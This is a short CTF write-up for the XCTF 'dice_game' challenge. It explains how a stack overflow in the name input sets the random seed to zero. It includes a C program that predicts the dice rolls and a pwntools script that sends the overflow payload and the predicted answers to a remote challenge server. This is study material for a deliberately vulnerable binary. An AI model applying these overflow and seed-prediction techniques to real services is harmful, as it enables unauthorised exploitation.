dice_game

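Challenge source: XCTF 4th-QCTF-2018

Challenge description: none

First, use the stack overflow to overwrite seed with 0, which makes the random sequence deterministic. Then write a C program that prints the rand results and send those values as the answers.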
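The C helper mentioned above is not shown in the post; the following is an added example, not the author's code, that reproduces the sequence for a known seed and checks it against the answer list used in the exploit. It assumes each roll is computed as rand() % 6 + 1 and that it is built against the same libc as the target, because rand output differs between implementations. The names predict_rolls, first_mismatch and PAGE_ANS are made up for this example.

```c
#include <stdio.h>
#include <stdlib.h>

#define ROUNDS 50   /* rounds answered by the exploit on this page */

/* Answer list copied from the exploit on this page (game_ans). */
static const int PAGE_ANS[ROUNDS] = {
    2, 5, 4, 2, 6, 2, 5, 1, 4, 2, 3, 2, 3, 2, 6, 5, 1, 1, 5, 5,
    6, 3, 4, 4, 3, 3, 3, 2, 2, 2, 6, 1, 1, 1, 6, 4, 2, 5, 2, 5,
    4, 4, 4, 6, 3, 2, 3, 3, 6, 1
};

/* Fill out[0..n-1] with the faces predicted for a given seed.
 * Assumption: the game derives each face as rand() % 6 + 1. */
void predict_rolls(unsigned int seed, int *out, int n)
{
    srand(seed);
    for (int i = 0; i < n; i++)
        out[i] = rand() % 6 + 1;
}

/* Index of the first differing element, or -1 if a and b agree on n items. */
int first_mismatch(const int *a, const int *b, int n)
{
    for (int i = 0; i < n; i++)
        if (a[i] != b[i])
            return i;
    return -1;
}

int main(void)
{
    int rolls[ROUNDS];

    predict_rolls(0, rolls, ROUNDS);   /* seed is 0 after the overwrite */

    /* Print as a Python list that can be pasted in as game_ans. */
    printf("game_ans = [");
    for (int i = 0; i < ROUNDS; i++)
        printf("%d%s", rolls[i], i + 1 < ROUNDS ? ", " : "]\n");

    /* A mismatch means a different libc or a different roll formula. */
    int bad = first_mismatch(rolls, PAGE_ANS, ROUNDS);
    if (bad >= 0)
        printf("differs from the page's list at index %d\n", bad);
    return 0;
}
```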

The exploit is as follows:

from pwn import *

# Local debugging alternatives:
#io = gdb.debug('./dice_game', 'b *$rebase(0xB99)')
#io = process('./dice_game')
io = remote('111.200.241.244', 63482)

io.recvuntil(b'Welcome, let me know your name: ')
# 64 filler bytes, then an 8-byte zero that overwrites seed
payload = b'a' * 64 + p64(0)
io.send(payload)
# rand results for seed 0, produced by the separate C program
game_ans = [2, 5, 4, 2, 6, 2, 5, 1, 4, 2, 3, 2, 3, 2, 6, 5, 1, 1, 5, 5, 6, 3, 4, 4, 3, 3, 3, 2, 2, 2, 6, 1, 1, 1, 6, 4, 2, 5, 2, 5, 4, 4, 4, 6, 3, 2, 3, 3, 6, 1]
for i in range(50):
    io.recvuntil(b'Give me the point(1~6): ')
    # send bytes, not str, so this works under Python 3
    io.sendline(str(game_ans[i]).encode())

io.interactive()

posted @ 2021-08-16 12:38  hktk1643